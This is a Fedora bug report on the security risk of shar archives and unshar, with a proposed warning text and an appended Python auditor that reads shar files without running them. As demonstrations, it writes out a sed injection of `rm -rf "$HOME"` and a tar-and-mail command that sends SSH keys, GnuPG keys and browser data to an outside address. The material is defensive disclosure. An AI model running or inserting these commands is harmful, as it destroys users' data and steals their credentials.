Bug 171865 - sharutils: outdated package description, unshar
Status: CLOSED CURRENTRELEASE
Product: Fedora
Classification: Fedora
Component: sharutils
Version: 4
Hardware: All
OS: Linux
Priority: medium
Severity: medium
Assigned To: Ngo Than
Keywords: Security
Reported: 2005-10-27 04:50 EDT by Craig Ringer
Modified: 2007-11-30 17:11 EST
Fixed In Version: FC6
Doc Type: Bug Fix
Last Closed: 2007-04-13 12:38:26 EDT
Description Craig Ringer 2005-10-27 04:50:04 EDT
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7

Description of problem:
Yum recommends that users install sharutils "if you send binary files through mail". The package description notes that email is "problematic for regular binary files".

Since shar is deeply scary from a security point of view, and mail clients and servers that break on binary are pretty rare now (and are better worked around using base64 or even uuencode), I think this might benefit from a change. I'm not at all convinced that `unshar' is a tool that it's even a good idea to have on a modern UNIX, given that its design purpose appears to be running code from remote, possibly untrusted, sources.

Consider:

echo "test file" > test
shar test > test.shar
sed -i 's/exit 0/rm -rf "$HOME"; exit 0/g' test.shar

and the resulting "fun" for the user who runs the file or uses `unshar' to extract it. Don't try that in a user account with data you care about. Also consider what could be accomplished with:

tar cf - 2>/dev/null .ssh .gnupg .mozilla/firefox/*.default/*.db .evolution/*.db \
  | gzip | mail -s "sucker" "my-addr@gmail.com"

or a little script to try to extract some email addresses from common clients and mail itself out. A big risk? Not really - many people won't even know what to do with shar archives now. At least FC4 defaults to opening them with a text editor (tested in evo, thunderbird).

Perhaps this package description might be better:

"The sharutils package contains the GNU shar utilities, a set of tools
for encoding and decoding packages of files (in binary or text format)
in a special plain text format called shell archives (shar). The shar
format has now been largely superseded by base64-encoded MIME for sending
binaries through email, its most common use.

WARNING WARNING WARNING

The shar format has some serious inherent security problems, given that
extracting an archive involves running whatever shell code is in the
archive, including possibly malicious code. DO NOT EXTRACT SHAR ARCHIVES
FROM UNTRUSTED SOURCES. Using unshar instead of just running the archive
will not protect you, as it simply calls out to the shell.

This tool is provided for legacy compatibility only. It's recommended that
you consider alternatives such as the MIME attachment support in `mutt' and
`pine', or a tool like `uudeview' for MIME/Base64 and/or uuencode, in 
preference to using shar."

Also, maybe it's a good idea to patch shar so the comments don't say:

# This is a shell archive (produced by GNU sharutils 4.2.1).
# To extract the files from this archive, save it to some FILE, remove
# everything before the `!/bin/sh' line above, then type `sh FILE'.

but rather

# This is a shell archive (produced by GNU sharutils 4.2.1).
#
# Do not extract this archive if it is not from a source you trust completely,
# or you have read this entire script in detail. Extracting this archive
# involves running a program with permission to do whatever it wants in your
# name, such as deleting your files or sending them to somebody else.
#
# To extract the files from this archive, save it to some FILE, remove
# everything before the `!/bin/sh' line above, then type `sh FILE'.

Any thoughts?

Version-Release number of selected component (if applicable):
sharutils-4.2.1-27

How reproducible:
Always

Steps to Reproduce:
n/a

Actual Results:  n/a

Expected Results:  n/a

Additional info:
Comment 1 Christian Iseli 2007-01-22 06:59:13 EST
This report targets the FC3 or FC4 products, which have now been EOL'd.

Could you please check that it still applies to a current Fedora release, and
either update the target product or close it?

Thanks.
Comment 2 Ngo Than 2007-04-13 12:38:26 EDT
Fixed in current FC release.
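
The report's point that unpacking a shar archive means running it can be sidestepped by reading the archive as data. The following is an added example, not part of the original report or of sharutils: a Python reader that recovers member contents from the heredocs without invoking a shell and reports every shell line outside a small allowlist. The heredoc form and the allowlist are assumptions sized for the constructed, cut-down sample; real shar output carries more scaffolding.

```python
import re

# Heredoc opener (simplified). An unquoted terminator would fail to match and be flagged.
HEREDOC = re.compile(r"\s*sed 's/\^X//' << '(\w+)' > '([^']+)'(?: &&)?\s*")
WORD = r"(?:'[^']*'|[\w.-]+)"
# Scaffolding accepted outside heredocs (assumption: sized for the sample below).
ALLOWED = [re.compile(p) for p in (
    r"\s*(#.*)?",                       # blank line or comment
    rf"\s*if test -f {WORD}; then",
    r"\s*(else|fi)",
    rf"\s*echo(?: {WORD})*",
    r"exit 0",
)]

def audit_shar(text):
    """Read a shar as data (nothing runs or is written). Returns (files, findings)."""
    files, findings = {}, []
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i]
        m = HEREDOC.fullmatch(line)
        if m:
            end, name = m.groups()
            if name.startswith("/") or ".." in name.split("/"):
                findings.append((i + 1, line))   # would write outside the cwd
            i += 1
            body = []
            while i < len(lines) and lines[i] != end:
                body.append(re.sub(r"^X", "", lines[i]) + "\n")  # sed 's/^X//'
                i += 1
            files[name] = "".join(body)
        elif not any(p.fullmatch(line) for p in ALLOWED):
            findings.append((i + 1, line))       # shell code not on the allowlist
        i += 1
    return files, findings

# Constructed sample: cut-down one-file archive ending in the report's tampered line.
SAMPLE = """#!/bin/sh
# This is a shell archive (produced by GNU sharutils 4.2.1).
if test -f 'test'; then
  echo 'x -' SKIPPING 'test' '(file already exists)'
else
  echo 'x -' extracting 'test' '(text)'
  sed 's/^X//' << 'SHAR_EOF' > 'test'
Xtest file
SHAR_EOF
fi
rm -rf "$HOME"; exit 0
"""
```

An empty findings list only means every line matched the allowlist; anything reported should be read by hand before the archive is ever handed to `sh`.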
